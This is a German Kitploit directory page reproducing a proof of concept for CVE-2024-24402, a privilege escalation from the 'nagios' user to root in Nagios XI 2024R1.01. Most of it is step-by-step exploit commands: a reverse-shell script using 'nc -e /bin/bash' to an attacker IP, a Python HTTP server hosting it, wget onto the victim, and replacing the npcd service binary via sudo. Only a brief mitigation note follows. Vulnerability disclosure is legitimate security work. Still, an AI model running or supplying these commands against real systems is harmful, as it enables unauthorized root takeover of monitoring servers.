Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-24402 — Privilegienerweiterung in Nagios 2024R1.01 | Kitploit
Tools/GitHubGitHub/mawk0235/cve-2024-24402
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed Teaming
GitHubmawk0235/cve-2024-24402

CVE-2024-24402

Privilegienerweiterung in Nagios 2024R1.01

Repository anzeigen
4vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Schwachstellenbericht

CVE entdeckt von: Jarod Jaslow (MAWK)

Details zur Schwachstelle:

  • Endpunkt: Nagios XI Version 2024R1.01
  • Schwachstellentyp: Privilegieneskalation vom Benutzer "NAGIOS"
  • Ergebnis der Ausnutzung: Voller Root-Zugriff auf das Zielsystem

Schritte zur Reproduktion:

1. Erstellen Sie eine frische Instanz von Nagios XI Version 2024R1.01:

  • Laden Sie die Nagios XI OVA-Datei herunter von: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
  • Stellen Sie die OVA bereit, um eine frische Instanz zu erstellen. -Nutzen Sie meinen vorherigen Bericht, um RCE auf dem Server zu erlangen

2. Privilegieneskalation ausnutzen:

  • Erstellen Sie als Benutzer "NAGIOS" eine Datei auf der Angreifermaschine mit folgendem Inhalt:

    root@kitploit:~
    #!/bin/bash
    nc -e /bin/bash <Attacker IP> 4445
    

Pasted image 20240118113554

  • Hosten Sie die Datei auf der Angreifermaschine über einen Python-HTTP-Server:

    root@kitploit:~
    python3 -m http.server 8000
    

Pasted image 20240118173813

  • Starten Sie einen Netcat (NC)-Server im Listen-Modus auf der Angreifermaschine:

    root@kitploit:~
    nc -nlvp 4445
    

Pasted image 20240118173831

3. Führen Sie die Ausnutzung auf dem Opfercomputer aus:

  • Holen Sie die Datei von der Angreifermaschine:

    root@kitploit:~
    wget http://<Attacker IP>:8000/npcd
    

Pasted image 20240118173846

  • Führen Sie die folgenden Befehle aus, um die Privilegien auszuweiten und eine Verbindung als Root zu erhalten:

    root@kitploit:~
    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    cp npcd /usr/local/nagios/bin/npcd
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
    

Pasted image 20240118173857

Pasted image 20240118173915

Empfehlung:

Es wird empfohlen, die Fähigkeit des Benutzers "NAGIOS" einzuschränken, in die als Root ausgeführten ausführbaren Dateien der Nagios-Dienste zu schreiben. Dies kann durch strengere Dateiberechtigungen und Zugriffskontrollen für die relevanten Verzeichnisse und Dateien erreicht werden, die mit den Nagios-Diensten verbunden sind.

Dies sollte in neuen Versionen behoben werden

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402

Tool herunterladen